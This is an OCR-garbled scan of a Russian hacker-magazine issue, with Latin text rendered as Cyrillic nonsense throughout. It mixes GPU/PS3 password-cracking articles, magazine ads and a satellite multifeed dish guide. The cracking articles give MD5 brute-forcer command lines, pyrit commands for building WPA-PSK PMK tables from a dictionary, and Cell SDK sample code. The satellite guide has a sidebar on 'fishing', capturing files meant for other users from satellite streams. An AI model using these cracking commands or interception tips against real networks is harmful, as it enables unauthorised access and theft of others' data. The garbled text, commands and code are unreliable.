ВагзИР_В8Е2_х64 . ехе -Ъ 21685Й282Й79098Ь89ЬЙ65 
а916Ь66с90 -X "030405313233" -тіп_1еп 12 

Где -X добавляет дополнительные значения для перебора, 
— тіп_1еп вносит максимальную длину пароля. 

• пѵСисІа гш)5 ( бНр5:/Логит.апбсЬа<:.ги/1:Ьгеаб62728.Ыт[ |. 
Дата утилита заточена для исполнения на 6Р9800. Неуди- 
вительно, потому как мультипроцессоров в ѲР88000ТХ 

— аж 1 6 штук! Причем, в каждом мультипроцессоре 8 про- 
цессоров; итого получаем 1 28. Каждый процессор ІМѴІсІіа 
выполняет инструкцию за четыре такта (ѲР9800 2400 
МГц), но восемь процессоров в 32-х потоках выполняют 
одинаковую инструкцию тоже за четы ре такта; то есть, 
(128*4) 512 потока на ѲР8800ЮВА будут выполняться с 
той же скоростью, как на 1 28-ядерном Репііит 1 500 МГц. 
Чуешь разницу? пѵСисІа т05 распространяется в исход- 
ных кодах, что оченьлюбопытно и полезно для остальных 
разработчиков. 

Синтаксисзапуска: 

пѵСТГОА_тй5 . ехе с=1оиега1рЬа-питегіс Г=тй5раз. 
ЕхЦ з = 1 е=9 Ъ=70 о=Гіпй. РхЦ 

Где с — набор символов из сНагвеІ.ІхІ, і — файл, откуда бе- 
рем хэши, в — начальная длина пароля, е — конечная длина 
пароля (15 тах], Ь — (( количество процессоров ) / 8) *5 или 
экспериментируем, о — файл, куда будутзаписываться 
найденные пароли. 



Давай подумаем, а для каких еще задач нам вообще могут 
понадобиться такие вычислительные возможности? К 
примеру, многие системные администраторы применяют 
на своих беспроводныхточках доступа не штатную защиту 
а усиленную (Р5Ы/Р5МА) с использованием ѴѴРА и ѴѴРА2. И 
почему бы не попробовать ее взломать? 

Н ПРОЩАЕМСЯ С ЖРА2: 

БЕСПРОВОДНЫЕ СЕТИ ОПЯТЬ УЯЗВИМЫ 

Совсем недавно компания ЕІсотзоН, знаменитая своими 
релизами для взлома всевозможных паролей, подала 
заявку на патентсописанием новойтехнологии подбора 
паролей в беспроводных сетях, использующих стандарты 
безопасности ѴѴРА и ѴѴРА2. По заявлениям разработчи- 
ков, методика обеспечиваетвдесятки раз более высокую 
скорость подбора пароля по сравнению со стандартны- 
ми средствами. Проведенные испытания показали, что 
правильный ключ ѴѴІ-РІ подбирается в 1 0-1 5 раз быстрее, 
если запустить брутфорс от ЕІсотзоО: на ноутбуке, уком- 
плектованном видеокартой І\ІѴЮІАОеРогсе 8800М или 
9800М. А использован петого же самого ПО на настольном 
ПК, оснащенном двумя или несколькими картами ІМѴШІА 
ОТХ280, повышает производительность приложения более 
чем в 100 раз. Наряду с этим существует ореп-воигсе проект 
ругіі І ЬКр://сосІе.аооаІе.сот/р/оЦі . ). нацеленный на взлом 
ѴѴРА Р5К, на котором мы и остановимся. Рассмотрим, поче- 
му ѴѴРА-Р5К (1/2) реально взломать. Ниже приведена схема 
подключения клиента к точке доступа. 

Стало быть, пользователь находит сеть и начинает коннект. 
Он вводит пароль, который вместе с названием сети ($510) 
формирует парный ключ (Раіпл/іве Мавіег Кеу — РМК]. Затем 
клиент объясняетточке доступа, что он хочетавторизиро- 
ваться. В ответточка доступа генерит произвольное число. 
Тогда клиентвырабатываетсвое число, состоящее из 
белиберды, полученного случайного числа точки доступа 




> Ііпкз 

• Ресурс, посвя- 
щенный ОС Еіпих на 
процессорах СеІІ: 

Ьзс.ез/ргоіесів/ 

Оеерсотрибпа/ 

Ііпихопсеіі 



• Информация для 
разработчиков при- 
ложений с использо- 
ванием мощностей 
видеокарт: 
пѵісііа . ги/оЬіесі/сисІа 
Іеагп ги.ЫтІ 



• Курслекций по 
паралелльными вы- 
числениям ФизТеха: 

пѵісПа.ги/оЫесі/сисіа 
зіаіе ипіѵегзИѵ 
соигвев ги.ЫтІ 
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Таблица с количеством подсчитанных РМКдляѴѴРА-ключа с использованием ругіі 



и РМК — все это называется Раіга/івеТгапвіепІ Кеу. Клиент 
посылает хотспоту только белиберду (свое рандомное 
число), подписанную ключом РТКІоно не зашифровано, 
а просто значится со статусом 5ІЗІ\ІЕ0).Хотспот получает 
это число, — точка доступа, естественно, знает пароль 
клиента и РМК, поэтому может за просто посчитать РТК, — и 
проверяет код целостности из подписанной белиберды. 
Если с ним все в порядке и используется действительный 
РТК- ключ, то клиенту высылают одобрение на дальнейший 
диалог, заверив его, в свою очередь, РТК. Клиент также про- 
веряет код целостности и то, что РТК подлинный, — после 
чего продолжает работу уже в защищенном канале связи. 
Немаловажным является стойкость самого пароля и кое- 
где — распространенность $$Ю для формирования РМК. 
Подобрав РМК, есть возможность вторгнуться в сеть, потому 
что один из его параметров можетбыть угадан простым пе- 
ребором из-за часто используемого 55Ю. Списки наиболее 
используемых $$Ю можно найти по адресу НПоѴАллллл/.ѵлаІе. 
пеі/арв/арв/таіп/евісівіаів . Пароль вполне реально угадать 
словарной атакой. Разберем случай, когда название сети 
(55Ю:КНЕМиМ) нам известно. Ругіі сгенерит множество 
РМК-ключей в единую таблицу (не секрет, что любое вычис- 
ление можетбыть представлено в виде таблицы), которую в 
дальнейшем можно скормить уже существующему софту для 
взлома ѴѴРА(соѴѴРАІІу). Кстати говоря, таблицы размером 
40 Гб я как-то выкладывал на одном из популярных блогов 
по информационной безопасности. Итак: 



РІауЗіаІіоп 3 или ХЬох. Сошлись, в итоге, что выбирать надо по 
критерию вышедших игр, а никак не по техническим харак- 
теристикам. А ведь вычислительные мощности современных 
приставокзаслуживаютвнимания! Окинем пристальным взо- 
ром характеристики процессора РІауЗіаІіоп 3 — СеІІ В своем 
арсенале Сеііимеетнативный процессор (РРІІ) с наличием 
8 ядер (5РІІ); в приставках нового поколения бренда Золу их 
планируется увеличитьдо 12. Каждыйтакой процессор, по 
словам создателей, способен совершать32 млрд, операций 
с плавающей точкой (ОідаРІорв) в секунду, а четыре целочис- 
ленных блока вместе — 32 млрд, операций (Ѳ0Р8) в секунду. 
Над проектом такого многоядерного процессора трудились 
три компании — Зопу, ТовбіЬа и ІВМ. Причем, принципы, зало- 
женные в архитектуру нового чипа, были разработаны еще в 
начале 2000 года инженерами ІВМ. Идея массового паралле- 
лизма, на которой базируется СеІІ, работаетвтакназываемой 
«клеточной архитектуре» («сеііиіаг агсбііесіиге»), В ней для со- 
здания суперкомпьютеров используется множество однотип- 
ных процессоров (от 10 тыс. до 1 миллиона), каждый из которых 
оснащен собственным контроллером РАМ и определенным 
объемом самой оперативной памяти. Наступаеттрогательный 
момент — а возможноли написать нам свои приложения под 
такой камень, после чего создать бюджетный ипподром для 
взлома самых разнообразныххэшей?Для этого сначала об- 
ратимся кофсайтуодногоиз пап СеІІ — ІВМ [ аІрЬаѵѵ 
сот/іесб/сеЦзѵѵ ). Пакет разработчика (ІВМ СеІІ ВгоасІЬапсІ 
ЕпдіпеЗоіІѵѵаге Оеѵеіортепі Кіі) распространяется в виде 
150-образа. Вообще, СеІІ поддерживает две вариации ССС: 
рри-дссиври-дсс. Методика работы с этими двумя пакетами 
проста: с помощью ври-дсс мы пишем модули для исполнения 
на отдельном ядре, а с помощью рри-дсс выполняем их цент- 
рализовано на процессоре. Естественно, рекомендуется рас- 
пределять отдельные вычисления на отдельное ядро, а потом 
писать для РРІІ исполняемую обертку, которая бы подключала 
модули для выполнения на каждом изЗРІІ. 

Общий подход продемонстрирован на примере: 

ТоисЫіеІІо_5ре.с 

#іпс1ийе <зСйіо.1і> 

Уіпсіисіе <зри_іпЫіпзісз . Ь> 
иг шаіп (ипзідпей Іопд Іопд і Й ) 

{ 

ргіпСЕ ( "Неііо Егот 5РІІ : 0х%11х\п" , ІЙ) ; 
геСигп 0 ; 

> 




> ѵѵагпіпд 

Статья написана 
для ознакомления 
стемой. В случае 
использования этой 
информации в про- 
тивозаконных целях, 
редакция и автор 
ответственности не 
несут. 



ругіС.ру -е ККЕМЬШ сгеаСе_еззій 
ругіС.ру -Г йісС.СхС ітрогС_раззиогйз (импор- 
тируем словарь паролей) 

ругіС.ру ЪаСсЬргосезз (процесс генерации по- 
шел) 

Полученные результаты можно смело экспортировать: 

ругіС.ру -е ККЕМЬШ -Е оиСриС.сои ехрогС_ 
совдраССу 

ѲРІІ позволяет нам сгенерировать за гораздо меньший срок 
огромное число РМК. С их помощью процесс взлома ѴѴРА- 
РЗКзаметноуменьшается по времени. 

Н СОВРЕМЕННЫЕ КОНСОЛИ, 

ИЛИ «ОН! ІТ 15 СКАСКЕТАТІОЫ!» 

Однажды я застал одного своего знакомого за серьезным 
умственным процессом: тот пытался решить, что же ему купить: 



После компиляции с флагом — о, обзовем нашу программу 
под 1 ядро, какврсМтеІІо. Далее пишем обертку под цент- 
ральный процессор: 

ТоисЬ рре_(іеІІо.с 

ііпсіийе <1іЬзре.1і> 

# іпсіийе <зСй1іЪ.1і> 

{Подключаем нашу программу зри_Гіе 1 1 о } 
ехГегг зре_ргодгат_1тапй1е_С зри_Ье11о; 
іпС шаіп() 

{ 

/* Создаем поток и записываем его ІЙ */ 
зреій_С зре_ій = зре_сгеаСе_С1ігеай ( 

О, &СезС_Ъапй1е, ШЬЬ, ШЬЬ, - 1, 0); 

ІпС зСаСиз; 

/* Проверяем ошибки */ 
і Г (зре_ій == 0 ) { 

реггог ( "ШаЫе Со сгеаСе ЭРЕ ЕЬгеай") ; 
ехіС (1) ; 
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СІ-Р-315 



Представь... бесшумная работа с ярким результатом. Новая линейка цветных лазерных 
принтеров и многофункциональных устройств Сатта' от Затзипд создана специально для 
тебя. Эти модели - самые компактные в своем классе и не занимают много места, 
а специально разработанные тонеры делают цветные отпечатки яркими и насыщенными. 

Хочешь позитива? Прими участие в промоакции Затзипд «Ищи цвет». Купи цветной лазерный 
принтер или МФУ Затзипд СбР-300, СІ_Р-3(Щ С1.Р-310, СІ_Р-ЗШ, СІ.Р-315, С6Р-315ѴѴ, 
СбХ-21 60, СбХ-21 60Ы, СІ.Х-3170РМ, СбХ-3175, С6Х-3175Ы, С6Х-3175РМ и С6Х-3175РѴѴ 
и получи в подарок дизайнерскую футболку, разработанную специально для тебя! 



Тамма 



аХ-3175 






Гамма положительных эмоций в подарок! 



цветной лазерный принтер 

8ат$ішд банта 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея $ат$ипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵі/.затзипд.сот. Товар сертифицирован. Реклама. 






Тестирование екоррсти работы МР5- взломщиков 



■ ННІ'і*-! Ѵ-НІ Л НН 



ІЙ Т» Э№ ДЙ 

<Ѵ4іІ(НГШІЧІи 




Исследовательский обзор нашего соотечественника Сваричевского Михаила Александровича — создателя ВагвѴѴР (одного из самых быстрых 
тсіб-крекеров на 6РІІ) 



> 

/* Ждем завершения */ 
зре_иаіб ( зре_ій, Ьзбабиз, 0 ) ; 
геСигп 0 ; 

> 

зри-дсс зре_1іе11о.с -о зре_Ье11о 

рри-етЬейзри зри_ргодгат_Ьапй1е зре_1іе11о зре_Ье11о_ 

сзЕ . о 

рри-дсс рре_1іе11о.с зре_ехатр1е_сзб . о -Ізре -о рре_Ье11о 

Раз уж ведем речь об использовании многопоточности, то корректным будет 
немного поговорить о библиотеке 1_ІЬ$РЕ. Эталиба позволяет программисту 
обращаться котдельномуЗРЕ-процессу. Внесуясность:то, что исполняется 
на одном 5РІІ, носит название 5РЕ (Зупегдівііс Ргосеввог Еіетепі). Она 
содержит пол ьзовательские инструкции для управления 5РЕ на отдель- 
ной операционной системе, а именно: приостанавливать его, задавать 
определенный приоритетна исполнение и т.п. В свою очередь, то, что будет 
подключать воедино и исполнять все 5РЕ на центральном процессоре (РРОІ 
— РИувісв Ргоссевіпд ІІпііІ, называется РРЕ (Рбувісв Ргосеввіпд Еіетепі). С 
недавнего времени біЕВРЕ обзавелась второй версией, и в текущем СеІІЗОК 
распространяется уже обновленная библиотека (с рядом критичных для про- 
граммиста новаций). иЬ$РЕ2задаетабсолютно новые способы создания 
отдельного потока. Пример подобного кода ты найдешь на нашем диске. 

Н ЫГШХ НА РЬАУЗТАТЮЫЗ — НАШ ВЕРНЫЙ ДРУГ! 

В качестве операционной системы для организации вычислений 
используется портированная версия Еіпих'а. Самая популярная и 
целенаправленно заточенная для запуска на консоли: Ѵеііоѵѵ йод Ыпих. 
Впрочем, с не меньшим успехом ты можешь установить любые дистрибу- 
тивы пингвина в ррс-версиях: взять хотя бы Ребога Ыпих или Визе. В них 
уже предустановлен СеІІВОК, правда, еще старой версии, без поддержки 
ІІЬвре2, ноты можешь скачать ее отдельно в .грт-пакете и установить 
привычной командой: 



# идеб ЬЫгр : / /иии.Ьзо . ез/ргот есбз/йеерсотриЬіпд/ 

1іпихопсе11/се11зіти1абог/зсІк2 . 0/1іЬвре2-2 . 0 . 1-1 . зге . грт 

# грт -і 1іЬзре2-2 . О . 1-1 . зге . грт 

Почему именно бтых и процессор СеІІ? Дело в том, что ядро бтих 
содержит инструкции для взаимодействия с псевдо-фа йловой системой 
вриів. Подразумевается, что один из ВРЕІ будет выделен для размеще- 
ния виртуальной файловой системы, поэтому размещенным там прило- 
жениям ничего не стоит взаимодействовать с ним. Естественно, во всем 
этом задействован низкий уровень, к которому простому пользователю 
или даже программисту вручную не подойти, поэтому в качестве интер- 
фейса для выполнения вычислений на отдельном ядре используется 
читабельная по АРІ и понятная для С-программиста библиотека Иі Ь5РЕ. 
Теперь немного отом, как одна из самых популярных Ореп-Зоыгсе 
платформ оказывается на борту игровой приставки. Процесс установ- 
ки достаточно прост: для начала тебе требуется подготовить базовый 
дистрибутив с ОС, записать его на болванку и вставить в привод консо- 
ли. Далее следует операция: выбираем Зувіет ЗеІІІпдв |под5еіІіпдв в 
стартовом меню), жмем I пзбаіі апоІИег 05 — начнется процедура поиска 
инсталлятора. Соответственно, если он найден не будет, то дистрибутив не 
удовлетворяет запуску на Р53, и его надо сменить на что-нибудь другое. 
Если же все прошло гладко, то появится путь найденного инсталлятора 
и потребуется немного подождать. Приглашение командной строки 
указывает на возможности установки: ІПБіаИіехі — текстовая, Іпвіаіі — гра- 
фическая. Следуй всем шагам, как на обычном ПК. Чтобы запустить только 
что установленную систему выполни: «(ЗеІІІпдв) -> (Зувіет ЗеІІІпдв] 
(Оеіаиіі Зувіет] -> ОіИегОЗ». 

В ЗАЧЕМ НАМ ТАКИЕ МОЩНОСТИ? 

Конечно, не только для взлома паролей! Разработки уже давно и активно 
применяют в области науки — для обсчета траектории точек крыла 
самолета, решения нелинейныхуравнений в инженерии и многого 
другого. Здорово, если ты почерпнул из статьи что-то новое, но помни, 
что главное — пустить это дело в нужное русло! ЦС 
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Ыікоп 

Основа изображения 



Первая в мире зеркальная фотокамера 
с функцией записи видео высокой четкости 

К ЕС* 




гл/ ГСП нэті 



190 



V. 



" 1 2 г Э-ммагике«пкпйР КЛ ОП •^□■чмиа фсфмчати N Ѵэп &Х 
* Система обработки нтбрале-ниті ІХРЁЁЬ 1 30 спе-я ми* 
- Системе рскгюзлдроінмі сч.к*сен с функун<і& рдаюімр- 
іініі * ^сіойишін ѴОА ЖК-мбдогер е ф^р-ніи^й №ѵ< 
Ѵйвѵ* 1 *ацти-р*і*ікіи ічбэр ю імбкносіей обработки Сии^>ор 
л шилрв ■ И чмоіе циоинрі ф^ыщні іопнен НО в^ідес 



Ыі^ФП кт: пріягтф фотокамера. Это МІпя 




МІККОР 




Г»*Т/|ЧГ 1 ■ 1 №Н 
< ЮТ ДОпВД* нкмУУи 
>и г^амнФми -ігач' 






‘ ТиФнСі ГАФйфф«Тйр*чгч-Лі 



|ЯН: .'‘іДОІУО «ЛМ#.ЛІІМ»Я.ІѴ 





'ВАСИЛИЙ АЛТУХОВ) 



ид? И какое отношение эта штука имеет 



СЧто за с тран ное слово 
4к спутниковой антенне? Как можно использовать несколько спутников од 
^новременно, чем лучше всего перехватывать файлы с помощью «рыбалки* 
— со всем этим мы и постараемся разобраться.*» ~ ^ |р * 



мульти 



СПУТНИКОВЫЕ 

ТІРБЫТРІСКБ^ 



'ХИТРЫЕ ПРИЕМЫ ДЛЯ СПУТНИКОВОГО ИНЕТА И ТВ 



Н МОТОРЫ И МУЛЬТИФИДЫ 

В сентябрьском номере за этот год я уже рассказал, для чего нужен 
спутниковый мотор, и какего настроить. Для тех, кто не читал, повторюсь: 
мотор нужен для приема множества спутников на однуантенну. Он авто- 
матически перенастраивает ее со спутника на спутник. Втой статье уже 
упоминался мультифид как альтернатива моторизированному подвесу, но 
в рамках одной статьи невозможно охватить сразу все, поэтому о мульти - 
фиде расскажу отдельно и обстоятельно. 

Начнем с того, для чего же он нужен. Мотор, бесспорно, хорош: практи- 
чески все спутники с ним доступны, но есть и недостатки. Во-первых, он 
достаточно долго (до 1 минуты) перенастраивается со спутника на спут- 
ник. Во-вторых, тебе наверняка захочется иметь возможность принимать 
сразу несколько спутников одновременно, например на одном «рыба- 
чить», а на другом кино или футбол посмотреть. Как раз в этой ситуации и 
выручит мультифид. 

Мультифид лишен перечисленных недостатков (хотя у него найдут- 
ся свои). Обычно его используют для приема спутников, располо- 
женных близко косновному, — какбы в придачу. Не менее часто 
мультифид применяют на моторизированных антеннах для приема 
спутников с другим типом поляризации: например, круговой поля- 
ризации, как на известном спутнике Еѵѵіеіваі ѴѴ4 (НТВ+ и Трико- 
лор), а также спутников другого диапазона, например, С-Ьапб, как 
на Ямал 201 . 

Пожалуй, самым существенным недостатком мультифида можно 
назвать малый угол отклонения отосновного спутника. На практике 
он редко превышает 10-1 2 градусов между орбитальными позициями 
(и, как правило, этого вполне достаточно). Скажем, частый вариант 
мультифида — это основной спутникЕігіыв 5Е; на нем есть неплохие 
интернет-сервисы, дополнительный НоіВігсІ 13Е и большой выбор 
телевизионных каналов. Вариантов существует много, так что все за- 
висит от твоих пристрастий и, конечно же, от физической возможности 
приема необходимого спутника. 



В ЛЮБИТЕЛЯМ СПУТНИКОВОГО ПРИЕМА 

Чтобы было понятно, постараюсь разъяснить на примере с обычным 
зеркалом. Трудно найти человека, который бы в детстве не запускал 
«солнечныхзайчиков». И наверняка,™ хорошо понимаешь принцип 

— «угол падения равен углу отражения». Атеперь пофантазируем. Пред- 
ставь, что на небосклоне сразу два солнца. Какты думаешь, сколько будет 
«зайчиков»? Конечно же, два! И чем дальше друг от друга два солнца, тем 
дальше будутдруг от друга и «зайчики». 

Спутниковая антенна тоже имеетзеркало (правильнее называть его 
«рефлектор»). Только форма у него не такая, каку обычного зеркала, 
а параболическая, и с ним не все так просто. Принцип «угол падения 
равенуглуотражения»здесьтоже работает, но с небольшими ого- 
ворками. Сигнал с основного спутника отражается от рефлектора и 
фокусируется на конвертере. Атеперь вспомним, что спутник в небе не 
один, — и это уже не из области фантастики, как с двумя солнцами. Ко- 
нечно, от рефлектора антенны отражаются сигналы со всех спутников, 
только фокусируются они не на основном конвертере, а в стороне от 
него, как в примере с двумя солнечными «зайчиками». Именно поэтому 
спутниковая антенна, имея один конвертер, может принимать сигнал 
только с одного спутника. А что если в точке, где фокусируется сигнал 
с другого спутника, установить еще один конвертер? Вот оно — чудо! 
Именно связка из двух конвертеров и называется мультифидом. 

Так давай же наставим столько конвертеров, сколько есть спутников, и 
будет нам счастье! Увы, это л ишь мечты. Спросишь почему? Да потому 
что параболический рефлектортем и хорош, что он фокусируетсигнал со 
спутника и складывается этот сигнал в фокусе в одной фазе, тем самым 
усиливаясь. Правило действуеттолько для одного источника сигнала 

— того, на который нацелен рефлектор. Сигнал с других источников тоже 
фокусируется, но, во-первых, фокус будет размазанным, а во-вторых, 
сигнал будет фокусироваться с разбегом по фазе и усиление тут меньше. 

И чем больше отклонение от основного источника сигнала, тем более 
размазанный фокус и меньшее усиление. Отсюда вывод: мультифид 



► 034 
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рс_гсіпе 



> ѵѵагпіпд 

Работая на крыше, 
будь предельно ос- 
торожен и используй 
страховку! 



> СІѴСІ 

На дискеты найдешь 
дополнительные 
материалы потеме. 



Самый обычный мультифид: удобно и просто 

имеетограничения поуглу отклонения и поусилению. Поэ- 
тому для приема на мультифид следует выбирать спутники, 
близко расположенные на орбите, и за основной спутник 
необходимо принимать тот, который с меньшей мощностью, 
потому что более мощный спутник проще будет принять на 
второй конвертер, смещенный из фокуса. 

Что такое мультифид, ты уже представляешь, теперь неплохо 
бы разобраться, в какуюточкуустановить второй конвертер. 
Здесь придется набраться терпения, потому что формулы 
расчета громоздкие и пугающие. Самые сложные формулы 

— это расчетугла места и азимута направления на спутник. 
Если ты привык добиваться всего своими силами, могу 
предложить посмотреть формулы в статье про мотор. Ну а тем, 
кто не желает себя затруднять, предлагаю скачать программу 
БаІеІІИе Апіеппа Аіідптепі на ШрУАллл/ѵѵ.аІ-зоК.сот/заа/ 
5аИп(о-ги.вЫ:т1 

Для определения места размещения второго конвертера 
нам требуется узнать разницу между азимута ми и углами 
места основного и дополнительного спутников. Рассмотрим 
пример: основной спутник — 5ігіиз 5Е, дополнительный 

— НоІВІгсІ 13Е. За свою практикуя досыта натренировался 
с формулами, поэтому воспользуюсь программой и возьму 
готовые результаты углов этих спутников для Москвы. 

Зігіиз 5Е Ат - 218.0 Е = 20.0 



Значения смещений мы получили, вот только куда сме- 
щать: влево или вправо, вверх или вниз? Запомни правило 
— смещать надо в зеркальном направлении отположения 
дополнительного спутника относительно основного. Встаем 
за антенной лицом к спутникам. Прямо, по направлению ан- 
тенны, находится основной спутник |в нашем случае — Зігіиз 
5Е), восточнее (левее) будет НоІВІгсІ 13Е — дополнительный. 
Согласно расчетныхуглов места, он находится выше, чем 
Зігіиз 5Е. Применив правило зеркала, получаем, что второй 
конвертер должен быть смещен западней (правее) и ниже, 
относительно основного. 

Вот здесь я тебя должен немного огорчить. Здорово было бы 
привинтить второй конвертер дома, в тепле и уюте, выставить 
все смещения и с чувством выполненного долга водрузить ан- 
тенну на крышу. Так не получится! К сожалению, все эти расчеты 
не дают абсолютно точного результата, потому что электромаг- 
нитная волна, отражаясь от рефлектора, ведет себя немного 
иначе, чем луч света, отраженный отзеркала, и разница в сме- 
щении, хоть небольшая, но есть. Поэтому расчетные значения 
приблизительны и используются только для предварительной 
оценки места установки второго конвертера. Окончательная 
настройка производится помаксимумусигнала. 



НоСВігсі 13Е Ат = 209.1 Е = 22.7 

Разница аз = 8 . 9 е = 2 .7° Н КРУТИМ ГАЙКИ 



Разницу между направлениями на спутник мы знаем. Для 
окончательного расчета нужен еще один параметр — фокус- 
ное расстояние антенны. Для прямофокусной антенны все 
просто: это расстояние от центра рефлектора до конвертера. 
В случае с офсетной антенной дела обстоят немного слож- 
нее, потому чтоунее негде померить истинное фокусное рас- 
стояние. Погуглив в справочниках по геометрии, произведя 
массу сложных расчетов, можно докопаться до истины и по- 
лучить заветное число, но на практике достаточно измерить 
расстояние от нижней кромки рефлектора до конвертера. 

Это число будет наиболее близким к фокусному расстоянию 
офсетной антенны. 

Допустим, у нашей антенны фокусное расстояние Р = 600 мм. 
Рассчитаем смещение по вертикали и горизонтали: 



Утомил теорией? Наверное, руки чешутся что-нибудь при- 
винтить и покрутить?Уговорил, переходим к практике :). 

Нам понадобятся: 

1. Второй конвертер. 

2. Переключатель ОіЗЕдС, для подключения двух конверте- 
ров к одному приемнику. 

3. Кронштейн для крепления второго конвертера. 

Конвертер и переключатель купи влюбом магазине оборудо- 
вания спутникового телевидения. Кронштейн можно купить 
там же, но я часто изготавливал его самостоятельно из 

двух резьбовых шпилек Мб и двух сантехнических хомутов. 
Сантехнические хомуты изначально предназначены для 
крепления водопроводных труб к стене и бывают разного 
размера. Подбирай такой хомут, чтобы он плотно обхватывал 
и зажимал «шейку» конвертера. 
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Хинты по спутниковой рыбалке 



Поток данных со спутника одинаков для всех: транспондер не может 
отправить данные для одного конкретного пользователя, поэтому 
передает «заказанные» файлы всем сразу. Определить, что эта часть 
потока предназначена для него, — задача непосредственно поль- 
зователя (вернее сказать, его оборудования и софта) . Естественно, 
при желании можно обрабатывать сразу весь поток, и при помощи 
специальных граббегов (сниферов) извлекать файлы, которые на 
самом деле были переданы другим пользователям. Такой прием, как 
мы уже когда-то рассказывали, называется «рыбалка» или «фишинг». 
К сожалению, программа 5ку№1, являющаяся первопроходцем в этой 
теме, больше не развивается. Зато разработкой занялись группы энту- 
зиастов, которые выпускают различные ее модификации. Например, 
популярный мод от К.ТОО (вверсияхкакдяяѴѴт32,такиІіпих) имодот 
50ККУ (он же ВеіаЗку) . Помимо этого огромную популярность завоевал 
с нуля написанный проект — Маппа ргсдесі (ѵтаду.таппа-ргоіесІ.пеЕ ) . 
Если всерьез решил заняться рыбалкой, будь готов к ежедневной 
работе по разбору всего того барахла, которое перехватит файл- 
граббер. Его будет не просто много, а катастрофически много. Чтобы 
облегчить себе жизнь, рекомендую взять на заметку несколько 
инструментов: 



Оііаіагіопе і .2 Г етеІѵа.Зсіп.ги ) — миниатюрная, но очень полезная 
утилита для определения типов файлов и автоматического их пере- 
именовывания. Невероятно полезна ввиду того, что перехваченные 
файлы зачастую оказываются без расширения в принципе. 
8ку8огіег ( трЗйзЬег.пагоб.ш) — мощная программа для сорти- 
ровки файлов, полученных снифером со спутника. Автоматически 
распаковывает многотомные архивы, подбирает к ним пароль, 
переименовывает птрЗ, о§§ файлов по информации из ГОЗ тэгов ѵі и 
ѵ2, а также сортирует графические файлы и видео. 

С1опе8ру ( игѵѵтѵ.сіопеврѵ.сот ) — компактная бесплатная утилита 
для поиска дубликатов файлов со множеством интересных решений. 
И еще один хинт. Иногда некоторые части архива некого перехва- 
ченного файла оказываются битыми или вообще теряются. Поте- 
рянную часть можно попробовать поискать в интернете, но удается 
это далеко не всегда. Куда проще отыскать ее у таких же рыбаков, как 
и ты. В этих целях некоторые энтузиасты поднимают специальные 
«серверы для ремонта», где некоторое время (обычно около недели) 
хранят все отснифанные файлы. Актуальный список серваков 
всегда доступен здесь: Ьігр : / /ѵіассезз&ее .Ьіг /(отит /зЬоѵѵгЬгеасІ . 
рЬр?г=27753 . 



Если конструкция конвертеродержателя на антенне не позволяетзакрепить 
хомут на «шейке» конвертера (элементарно не хватает места), то можно взять 
хомут большего диаметра и закрепить его за облучатель (за «голову» конвер- 
тера). Далее— смотрим фотографии с подробным описанием. 

Кактыуже, наверное, обратил внимание, на каждом из этих мультифидов своя 
конструкция кронштейна. Делались кронштейны изтого, что было под рукой :]. 
Тебе тоже никто не запрещает применить смекалку и сделать по-своему; самое 
главное, чтобы конвертер мог иметь две степени свободы — по горизонтали и 
вертикали, и надежно фиксироваться в нужном положении. 

Вооружился всем необходимым? Можно приступать кустановке антенны 
с мультифидом. Не исключаю, что эту статью читает человек, абсолютно 
не представляющий, как настраивать спутниковую антенну. Опишу, пожа- 
луй, подробно процедуруустановки и настройки. 

Итак, первоочередная задача — настроиться на основной спутник. Для 
начала нужно выбрать и подготовить место установки. Место выбирай так, 
чтобы по направлению на спутник (а лучше, на как можно больше спутни- 
ков!) не было никаких преград — зданий, там, или деревьев. В идеале, надо 
избегать даже натянутых проводов по направлению приема. Азимуты на 
спутники ты можешь рассчитать при помощи программы ЗаіеШіеАпІеппа 
Аіідптепі. Определить направление по азимуту на месте можно при помо- 
щи компаса, но точнее будет, если ты при помощи этой же программы пос- 
читаешь, в какое время направление на солнце будет совпадать с азимутом. 
Учитывать необходимо еще ито, что антенну нужно закрепить как можно 
надежней: хорошо, если это будет на капитальной стене здания. Немало- 
важно, чтобы тебе было удобно настраивать антенну; редко, конечно, так 
получается, но продумать этотмомент стоит заранее. Настраивая антенну 
впервые,™ проведешь около нее массувремени. 

Надеюсь, что опору ты закрепил достаточно надежно. Теперь тебе необ- 
ходимо запастись линейкой и отвесом — и выполнить предварительные 
расчеты. Рассчитай при помощи программы угол места для спутника 
и угол офсетности твоей антенны. Отняв отугла места угол офсетности, 
мы получим угол, на который должен быть наклонен рефлектор антенны 
относительно вертикали. Если цифра получилась положительной, то ан- 
тенна будет смотреть вверх; если отрицательная,™ вниз. Не пугайся, если 
тебе покажется, что антенна смотрит в землю. Это особенность офсетной 
антенны — на самом деле «луч» приема будет направлен выше горизонта. 
Угол наклона антенны у нас есть, осталось правильно его выставить. Для 
этого нужно измерить большой диаметр антенны и умножить это значение 
на синус угла наклона — тем самым получив длину одного из катетов пря- 



моугольного треугольника. Его гипотенузой является отрезок, лежащий на 
плоскости антенны и равный по длине большому диаметруантенны. 
Вешаем антенну на опору и выставляем угол наклона, как показано на 
рисунке. В данном случаеугол наклона положительный. Если онутебя 
получился отрицательный, то линейку нужно будет прикладывать снизу. 
Если ты настраиваешь спутник, азимут которого не сильно отличается 
от направления на юг (до 15 градусов), то конвертер следуетустановить 
вертикально. Когда азимут спутника сильно отличается от направления 
на юг, то поверни конвертер по часовой стрелке, если спутник ближе к 
западу— и против часовой стрелки, если ближе квостоку. Направле- 
ние поворота нужно определять, стоялицом кспутнику. Поворачивать 
конвертер нужнотем сильнее, чем больше отличается азимутспутника 
от направления на юг. Максимальный угол поворота на самых крайних 
спутниках — не более 35 градусов! 

Для конвертеров с круговой поляризацией поворот не имеетзначения, 
крепить его можно какугодно. Для конвертеров С-Ьапб с круговой поля- 
ризацией следует повернуть его так, чтобы вода, попавшая в волновод, 
не затекала в электронный блок. А затекать вода может только в тех 
местах, где в волновод входят приемные зонды (штыри). 

Если наклон рефлектора выставлен верно, — это 90% успеха. Останется 
только повернуть антенну в нужном направлении. Шансы на удачную на- 
стройку увеличатся, если ты, рассчитав при помощи программы ЗаіеШІе 
Апіеппа Аіідптепі время, когда солнце находится в направлении по 
нужному азимуту, заметишь какой-нибудь ориентир, где будет находиться 
солнце в расчетное время, и приустановке направишьантеннуна него. 
Совет: используй, как прицел, штангу конвертеродержателя. 

Идеальным вариантом будет, если для контроля сигнала ты вытащишь при- 
